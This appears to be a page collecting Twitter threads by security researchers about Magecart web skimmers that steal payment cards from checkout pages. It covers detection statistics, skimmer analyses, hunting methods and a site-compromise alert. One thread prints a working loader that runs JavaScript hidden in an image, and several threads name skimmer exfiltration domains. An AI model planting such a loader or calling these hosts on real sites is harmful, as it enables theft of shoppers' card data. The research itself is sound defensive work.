Discover and read the best of Twitter Threads about #magecart

Most recent (13)

While #infostealer detections trended downwards in 2022, decreasing by 10% in #ESET telemetry, #banking malware doubled in numbers YoY. #ESETresearch 1/4
This phenomenon was caused by the prevalence of the web skimmer JS/Spy.Banker, also known as #Magecart. Throughout the year, it consistently accounted for about three-fourths of banking malware detections. It was also the third most detected infostealer overall in T3 2022. 2/4
Despite its prevalence, Magecart wasn’t the only banking malware to stand out this time: LATAM banking trojans had a strong end of the year; the detections of #Grandoreiro, #Casbaneiro, #Mekotio, and several others spiked significantly in T3. 3/4
Read 4 tweets
Been looking at a digital skimmer/#magecart script I call "ManyQ" and figured I'd share what I've found.

Highlights: 200+ victims, in use since at least Feb 2020, and, most interesting, might be by Sochi, the creator of Inter.

1/30
Going to cover a fair amount of ground here:

- How it works
- Share some various copies of it
- Infrastructure it's been deployed on and related Infrastructure
- Connections to Inter

And, yeah, "ManyQ" isn't the greatest name, but naming things is hard.

2/30
Ok, first, here's some source code:

ManyQ Obfuscated: gist.github.com/krautface/ea24…

ManyQ Fully Deobfuscated: gist.github.com/krautface/5c13…

This skimmer was the one exfiltrating via Google Apps Script, but that's not directly a function of it:


3/30
Read 31 tweets
Thanks to data from @sansecio I think we've found the first digital skimmer/#magecart script to exfil using Telegram. In this thread, I'll go through the code, the drawbacks of this approach, and how to stop it dead (hint: CSP).

1/11
This of course isn't the first digital skimmer to abuse unrelated services to exfil its data. For example, back in June we saw the public disclosure of digital skimmers abusing Google Analytics: sansec.io/research/skimm…

2/x
A prettified version of the script is here: gist.github.com/krautface/c07a…

It's mostly unaltered, but I did redact one bit of information which I'll mention later.

3/x
Read 12 tweets
Saw this new digital skimmer/#magecart JS for the first time last week. Haven't had time to dig really deep into it, but here's the basic overview. Calling it the Callback skimmer for now. Above average JS for a digital skimmer.

1/9
As I said, this is going to be a quick overview. Here's the loader:
gist.github.com/krautface/5a29…

2/9
That calls out to hxxps://jquery-cycle[.]com/analytics.js?q=0.44886615665744056 which returns the following code: gist.github.com/krautface/91c6…

It is encoded, but the Callback loader decodes it and runs it. If I recall correctly, that code just makes the same call again.

3/9
Read 10 tweets
Skimmers write actual spaghetti code... In an unexpected plot twist, card-stealing malware was disguised as Italian cuisine. #magecart #webskimmer 1/3
Normally criminals go out of their way to hide their work, but this pasta fan didn't seem to care. Also, the card collection server is pizdasniff[.]site, which is proper Russian for "pussyskimmer". 2/3
Despite its glaring presence, the skimmer has been injected in numerous sites since Dec 12th and most are still active. We have reached out to all affected merchants.
Read 4 tweets
New digital skimmer/#magecart technique: steganography

A colleague found this a couple of days ago while searching through our SIEM. The skimmer group uploads or modifies an existing image and appends the JS code.

1/5
Here's an example of a live image. You can load this image and prepend "view-source:". The next tweet has the code that loads and runs the code in this image. The full skimmer code is in a gist on the last tweet.

hxxps://www.truthinaging[.]com/media/wysiwyg/FreeShipping.jpg

2/5
var xhr = new XMLHttpRequest();
// '<image>' stands for the URL of the hosted image that has the skimmer JS appended
// (placeholder kept as in the original tweet)
xhr.open('GET', '<image>', true);
xhr.send();
xhr.onreadystatechange = function() {
    if (this.readyState != 4) return;   // wait until the request has completed
    if (this.status == 200) {
        // the trailing 19704 bytes of the "image" are JavaScript: compile and run them
        var F = new Function(this.responseText.slice(-19704));
        return F();
    }
};

3/5
Read 6 tweets
I think I stumbled upon a novel digital skimmer/#magecart script still in development and figured I'd share all the code and (limited) infrastructure I've found so far. And I'll share the simple method to stop this technique dead (tweet 16 😉)

First, what makes it unique?

1/17
- Malicious payload is loaded over websockets
- Exfil over websockets
- A rather clever skimmer loader that I think may fool a lot of people
- CSS classes(!) being used to construct the URL

Intrigued? Great. Let's go

2/x
Let's look at the skimmer loader. Look like anything you're used to seeing? querySelector, className, Canvas ondraw? What in the world? Where's the script tag created?

3/x
Read 17 tweets
:: Magecart Hunting Thread ::

This is a thread about how to hunt and find #Magecart infected sites using @URLscan. 💰💵

♻️Please retweet to help spread knowledge and feel free to add your own techniques, ideas, and suggestions.

⚠️THREAD⚠️
A brief overview of Magecart.

Magecart is an umbrella term for the technique of injecting JavaScript to steal credit card numbers on E-commerce sites. A number of actors/groups operate under the same term implanting JavaScript onto checkout pages all over the world.
To get started we need a foothold.
I have a hunt running looking for a known Magecart hash.

This morning a new site hit the search; looking at the site, I then used the filename as a pivot. The filename which is infected with Magecart is "jquery_noconflict.js".
Read 15 tweets
Let’s do a quick dive into quickly pulling out the interesting bits from an obfuscated #magecart script. And by that I mostly mean the exfil URL. This will only cover one of the most common obfuscator types, as featured at javascriptobfuscator.com and obfuscator.io.
There’s lots of other types as well, but this is a good place to start. First, the simplest type, one with hex encoded strings. You can play with that one here: gist.github.com/krautface/aed4…
This is really easy to deobfuscate completely, using beautifier.io, but if you just want to know what’s in that array of strings, just copy the [ … ] into your devtools and hit enter and presto, your work is done.
Read 12 tweets
Want to learn to hunt for some #magecart infrastructure? Then you've come to the right place. Going to walk you through how to do it, from the very start to the end. /thread (probably 30-35 tweets, so hope you're interested)
Just found a couple of domains that I haven't seen elsewhere, so if you stick through to the end you'll get to see newly discovered infrastructure. If you somehow knew of it already, let's talk, I'd be curious how you came upon them.
2/x
First, a disclaimer/ask: when you're doing this, you're going to find affected websites. There's lots and lots of them. Maybe don't name and shame the little guys? Takes about the same amount of time to send them a quick note as it does to highlight that they're affected.
3/x
Read 37 tweets
A week or so ago I broke down one #magecart loader, which was pretending to be Google Analytics -

Today, let's look at another version of this they use which purports to be Google Tag Manager. Most of this will look pretty similar to the GA version.
So here's the code we'll be looking at as you would see it on an infected website: gist.github.com/krautface/e0f8…
and then here's the same thing prettified:
gist.github.com/krautface/e8f0…
Lines 3-14 in the prettified version look like they're doing something. If you look at line 47 you can see the arguments passed into this anonymous function: window, document, 'script', 'dataLayer', 'GTM-WYRDH'. Lines 10-14 actually create a legit script tag; it's just never used.
Read 10 tweets
Annoyed as hell with a certain company's abuse department, so let's examine one of these #magecart / digital skimming loader techniques. The goal here will be to figure out what script it's trying to load. A thread, or something 1/13
Here's a common technique from a group. They try to make it look like something for Google Analytics, but it's clearly not. So what is it doing?

gist.github.com/krautface/5228…

First, you'll notice some weird variable names: showArticle, textAside, openReader, firstDescription. 2/13
There's no meaning behind them, they're pretty random and are frequently changed. Pay little attention to them.

Let's clean up the code a little bit and see what's actually going on here. 3/13

gist.github.com/krautface/4ea5…
Read 13 tweets
⚠️ WARNING ⚠️
@Forbes Magazine subscription website (forbesmagazine.com) is infected with #magecart malware.

Exfil domain: fontsawesome[.]gq (🇧🇬)
@urlscanio results: urlscan.io/result/8630561…
Deobfuscated code: pastebin.com/3AR7wQ70
@Forbes @urlscanio forbesmagazine.com is back online and we've confirmed the malware has been removed.

If you made a purchase on the site while it was compromised, your credit card information was likely stolen.

@Forbes @urlscanio We've been receiving a lot of questions from reporters regarding this incident. Here's the timeline so far:
Read 7 tweets